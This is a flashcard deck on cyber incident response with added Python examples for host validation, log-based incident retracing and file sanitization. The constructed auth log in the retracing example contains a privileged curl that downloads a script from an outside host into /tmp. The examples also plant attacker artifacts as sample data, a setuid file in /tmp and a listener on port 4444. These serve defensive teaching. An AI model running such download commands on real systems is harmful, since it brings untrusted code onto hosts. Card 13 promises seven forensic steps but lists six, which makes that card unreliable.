3.5 Cyber Incident Response Flashcards

1
Q

what is the best way to determine the attack vector used by a hacker?

A

reverse engineering (retracing the attacker's steps through the logs of the affected devices and of the infrastructure devices involved)

2
Q

why should a first responder be familiar with the incident response plan?

A

to ensure that the appropriate procedures are followed

3
Q

which eradication technique involves reinstalling the operating system, applying all system updates, reinstalling the anti-malware software, and implementing the organization's security settings?

A

reconstruction or re-imaging

4
Q

what are the FOUR validation techniques?

A

patching, verifying permissions, scanning, verifying logging/communication to security monitoring
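Added example, not part of the original flashcard deck: a script that runs the four validation checks from this card against a rebuilt host. The host snapshot (installed package versions, a `stat -c '%a %U %n'` listing, the open ports found by a post-rebuild scan, and the log forwarder's state) is constructed for illustration, and the baseline values and the collector address `siem.corp.example:6514` are assumptions. Each check returns findings rather than a pass/fail, so the incident response team can see exactly which validation step is not yet satisfied.

```python
"""Post-eradication validation checks over a constructed host snapshot (added example)."""
import re
from datetime import datetime, timedelta, timezone

# --- Constructed evidence from a rebuilt host; none of this is real output ---
INSTALLED_VERSIONS = {"openssh-server": "9.6p1-3ubuntu13.4", "sudo": "1.9.15p5-3ubuntu5"}
PATCH_BASELINE = {"openssh-server": "9.6p1-3ubuntu13.5", "sudo": "1.9.15p5-3ubuntu5"}
STAT_OUTPUT = """\
600 root /etc/shadow
644 root /etc/passwd
4755 root /usr/bin/sudo
4755 root /usr/bin/passwd
4755 root /tmp/.x
666 www-data /var/www/html/upload.php
"""  # shape of: stat -c '%a %U %n' <paths>
EXPECTED_SETUID = {"/usr/bin/sudo", "/usr/bin/passwd"}   # assumed allow-list
SCAN_OPEN_PORTS = {22, 80, 4444}                          # from a post-rebuild port scan
EXPECTED_PORTS = {22, 80}
LOG_FORWARDER = {"destination": "siem.corp.example:6514",
                 "last_ack": datetime(2024, 3, 10, 9, 40, tzinfo=timezone.utc)}
EXPECTED_SIEM = "siem.corp.example:6514"                  # assumed collector address
NOW = datetime(2024, 3, 10, 10, 0, tzinfo=timezone.utc)


def version_key(version):
    """Split '9.6p1-3ubuntu13.5' into comparable chunks; numbers compare numerically."""
    return [(0, int(t)) if t.isdigit() else (1, t) for t in re.findall(r"\d+|[^\d]+", version)]


def check_patching(installed, baseline):
    """1. patching: every package in the baseline is present at or above the patched version."""
    return [f"patching: {pkg} is {installed.get(pkg, 'missing')}, baseline requires >= {ver}"
            for pkg, ver in baseline.items()
            if pkg not in installed or version_key(installed[pkg]) < version_key(ver)]


def check_permissions(stat_output, expected_setuid):
    """2. verifying permissions: no world-writable files, no setuid binaries outside the allow-list."""
    findings = []
    for line in stat_output.splitlines():
        mode_text, owner, path = line.split(maxsplit=2)
        mode = int(mode_text, 8)
        if mode & 0o002:
            findings.append(f"permissions: {path} is world-writable ({mode_text}, owner {owner})")
        if mode & 0o4000 and path not in expected_setuid:
            findings.append(f"permissions: unexpected setuid binary {path} ({mode_text}, owner {owner})")
    return findings


def check_scan(open_ports, expected_ports):
    """3. scanning: anything listening that the rebuilt host is not supposed to expose."""
    return [f"scanning: unexpected listening port {p}" for p in sorted(open_ports - expected_ports)]


def check_logging(forwarder, expected_siem, now, max_age=timedelta(minutes=5)):
    """4. verifying logging: forwarder points at the SIEM and the SIEM acknowledged events recently."""
    findings = []
    if forwarder["destination"] != expected_siem:
        findings.append(f"logging: forwarder sends to {forwarder['destination']}, expected {expected_siem}")
    age = now - forwarder["last_ack"]
    if age > max_age:
        findings.append(f"logging: last event acknowledged by the SIEM {int(age.total_seconds())}s ago")
    return findings


def validate_host():
    """Run all four validation techniques; an empty list means the host can be returned to service."""
    findings = []
    findings += check_patching(INSTALLED_VERSIONS, PATCH_BASELINE)
    findings += check_permissions(STAT_OUTPUT, EXPECTED_SETUID)
    findings += check_scan(SCAN_OPEN_PORTS, EXPECTED_PORTS)
    findings += check_logging(LOG_FORWARDER, EXPECTED_SIEM, NOW)
    return findings


if __name__ == "__main__":
    for finding in validate_host():
        print(finding)
```

With the constructed snapshot the script reports five findings: one package below the patch baseline, a world-writable upload script, a setuid binary in /tmp, an unexpected listener on port 4444, and a log forwarder whose last acknowledgement is twenty minutes old. On a real host the snapshot would come from the package manager, `stat`, a scanner, and the forwarder's status, and the baseline from the change management system.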

5
Q

what is the name of the security process that involves recognition, verification, classification, containment, and analysis?

A

incident response

6
Q

what are the THREE eradication techniques?

A

sanitization, reconstruction or re-image, secure disposal

7
Q

what are the FOUR containment techniques?

A

segmentation, isolation, removal, reverse engineering

8
Q

which containment technique involves limiting the scope of the incident by using existing network segments as barriers to keep the incident from spreading to other segments?

A

segmentation

9
Q

which containment technique involves retracing the steps of the incident as seen in the logs of the affected devices or in the logs of infrastructure devices that may have been involved?

A

reverse engineering
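Added example, not part of the original flashcard deck, covering this card and card 1 (determining the attack vector): a script that retraces an incident by merging an affected host's auth log with the perimeter firewall's connection log into one timeline, then locates the first successful login, counts the failed attempts that preceded it, checks that the firewall corroborates the same source address, and lists what happened afterwards. Both logs are constructed sample data (documentation IP ranges, hostnames `web01` and `fw01`), and the year for the syslog timestamps is an assumption since syslog lines carry none.

```python
"""Retrace an incident from host and infrastructure logs (added example, constructed data)."""
import re
from dataclasses import dataclass
from datetime import datetime, timezone

# Constructed sample logs (not real captures): the affected host's auth log and the
# perimeter firewall's connection log for the same window.
HOST_AUTH_LOG = """\
Mar 10 02:13:07 web01 sshd[4121]: Failed password for root from 203.0.113.45 port 51022 ssh2
Mar 10 02:13:09 web01 sshd[4121]: Failed password for root from 203.0.113.45 port 51022 ssh2
Mar 10 02:13:12 web01 sshd[4125]: Accepted password for deploy from 203.0.113.45 port 51030 ssh2
Mar 10 02:14:40 web01 sudo: deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/usr/bin/curl -o /tmp/x.sh http://198.51.100.7/x.sh
"""
FIREWALL_LOG = """\
2024-03-10T02:12:58Z fw01 ACCEPT src=203.0.113.45 dst=10.0.1.20 dport=22 proto=tcp
2024-03-10T02:14:41Z fw01 ACCEPT src=10.0.1.20 dst=198.51.100.7 dport=80 proto=tcp
"""
LOG_YEAR = 2024  # syslog timestamps carry no year; assumed from the incident date

SYSLOG_RE = re.compile(r"^(\w{3} +\d+ \d\d:\d\d:\d\d) (\S+) (\S+?)(?:\[\d+\])?: (.*)$")
SSH_RE = re.compile(r"^(Failed|Accepted) password for (\S+) from (\S+) port")
SUDO_RE = re.compile(r"USER=(\S+) ; COMMAND=(.*)$")
FW_RE = re.compile(r"^(\S+) (\S+) (ACCEPT|DROP) src=(\S+) dst=(\S+) dport=(\d+)")


@dataclass(order=True)
class Event:
    ts: datetime
    source: str   # device the record came from
    kind: str     # normalised event type
    detail: str   # 'key=value ...' for auth and firewall events


def kv(detail):
    """Turn 'user=deploy src=203.0.113.45' into a dict."""
    return dict(item.split("=", 1) for item in detail.split())


def parse_host_log(text, year=LOG_YEAR):
    """Normalise sshd and sudo records from a syslog-format auth log."""
    events = []
    for line in text.splitlines():
        m = SYSLOG_RE.match(line)
        if not m:
            continue
        stamp, host, prog, msg = m.groups()
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)
        if prog == "sshd" and (s := SSH_RE.match(msg)):
            kind = "ssh_login_ok" if s.group(1) == "Accepted" else "ssh_login_fail"
            events.append(Event(ts, host, kind, f"user={s.group(2)} src={s.group(3)}"))
        elif prog == "sudo" and (s := SUDO_RE.search(msg)):
            events.append(Event(ts, host, "privileged_cmd", f"as={s.group(1)} cmd={s.group(2)}"))
    return events


def parse_firewall_log(text):
    """Normalise connection records from the (constructed) firewall log format."""
    events = []
    for line in text.splitlines():
        m = FW_RE.match(line)
        if not m:
            continue
        stamp, device, action, src, dst, dport = m.groups()
        ts = datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(Event(ts, device, f"fw_{action.lower()}", f"src={src} dst={dst} dport={dport}"))
    return events


def build_timeline(*event_lists):
    """Merge events from every device into one chronologically ordered timeline."""
    return sorted(e for events in event_lists for e in events)


def retrace(timeline, affected_host):
    """Find the first successful login on the affected host, what preceded it, and what followed."""
    entry = next((e for e in timeline if e.source == affected_host and e.kind == "ssh_login_ok"), None)
    if entry is None:
        return None
    who = kv(entry.detail)
    src = who["src"]
    failed_before = sum(1 for e in timeline if e.ts < entry.ts and e.kind == "ssh_login_fail"
                        and kv(e.detail)["src"] == src)
    # The infrastructure log corroborates the host log: the firewall saw the same source reach port 22.
    corroborated = any(e.kind == "fw_accept" and e.ts <= entry.ts and kv(e.detail)["src"] == src
                       and kv(e.detail)["dport"] == "22" for e in timeline)
    followups = [f"{e.ts.isoformat()} {e.source} {e.kind}: {e.detail}" for e in timeline if e.ts > entry.ts]
    return {
        "initial_access": f"ssh password login as {who['user']} from {src}",
        "failed_attempts_before": failed_before,
        "corroborated_by_firewall": corroborated,
        "post_access_activity": followups,
    }


if __name__ == "__main__":
    timeline = build_timeline(parse_host_log(HOST_AUTH_LOG), parse_firewall_log(FIREWALL_LOG))
    for e in timeline:
        print(e.ts.isoformat(), e.source, e.kind, e.detail)
    print(retrace(timeline, "web01"))
```

For the constructed logs the attack vector comes out as a password login over SSH as `deploy` from 203.0.113.45 after two failed attempts, corroborated by the firewall's accept on port 22 fourteen seconds earlier, followed by a privileged `curl` to an external host that the firewall also recorded. Merging device logs by timestamp only works when the clocks agree, so confirm NTP state on each device before trusting the ordering.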

10
Q

what is the name of the group of people appointed to respond to security incidents?

A

incident response team

11
Q

which type of review should be completed last as part of incident response?

A

a post-mortem review

12
Q

which containment technique involves either blocking all traffic to and from the affected device or devices, or shutting down the device or devices' interfaces?

A

isolation

13
Q

what are the SEVEN steps in a FORENSIC INVESTIGATION?

A
  1. identification
  2. preservation
  3. collection
  4. examination
  5. analysis
  6. presentation
14
Q

which eradication technique removes all traces of the threat by overwriting the drive multiple times to ensure all data on it is destroyed?

A

sanitization
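Added example, not part of the original flashcard deck: a multi-pass overwrite of a file, with a verification step that reads the data back and confirms the original content is gone. The secret content is constructed, and the file is a temporary file created by the script itself so that it runs safely anywhere.

```python
"""Multi-pass overwrite (sanitization) with verification (added example, constructed data)."""
import os
import secrets
import tempfile

# Constructed content that must not survive sanitization.
MARKER = b"SECRET-PAYLOAD-" * 64


def overwrite_file(path, passes=3, chunk=64 * 1024):
    """Overwrite every byte of `path` in place `passes` times, cycling zeros, ones, random.

    Each pass is flushed and fsync'd so the data actually reaches the device before
    the next pass starts. Returns the number of bytes overwritten per pass.
    """
    size = os.path.getsize(path)
    patterns = [b"\x00", b"\xff", None]  # None means a fresh random pattern
    with open(path, "r+b") as f:
        for i in range(passes):
            pattern = patterns[i % len(patterns)]
            f.seek(0)
            remaining = size
            while remaining > 0:
                n = min(chunk, remaining)
                f.write(pattern * n if pattern is not None else secrets.token_bytes(n))
                remaining -= n
            f.flush()
            os.fsync(f.fileno())
    return size


def sanitize_and_verify(path, passes=3):
    """Sanitize the file, then read it back and check that the original content is gone."""
    size = overwrite_file(path, passes)
    with open(path, "rb") as f:
        data = f.read()
    return {
        "bytes_overwritten": size,
        "passes": passes,
        "marker_present": MARKER[:15] in data,   # must be False after sanitization
        "size_unchanged": len(data) == size,
    }


def demo():
    """Write the constructed secret to a temp file, sanitize it, and return the verification result."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(MARKER)
    try:
        return sanitize_and_verify(path)
    finally:
        os.remove(path)


if __name__ == "__main__":
    print(demo())
```

The caveat a responder needs: overwriting a file through the filesystem only sanitizes the blocks that file currently maps to. Copy-on-write or journaling filesystems, wear-levelled flash and SSD over-provisioning can leave older copies of the data in places this loop never touches, so drive-level sanitization should use the device's own secure-erase command or a tool that writes the raw block device, and the host is then rebuilt with the re-imaging technique from card 3. Modern guidance (NIST SP 800-88) also treats a single full overwrite as sufficient for current magnetic media; the multiple passes on this card are the older practice.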

15
Q

in which location should all changes made to your organization’s network and computers be listed?

A

in the change management system

16
Q

what are the FIVE steps in the INCIDENT RESPONSE PROCESS?

A

contain, eradicate, validate, corrective action, reporting

17
Q

what is incident management?

A

the activities an organization carries out to identify, analyze, and correct risks as they arise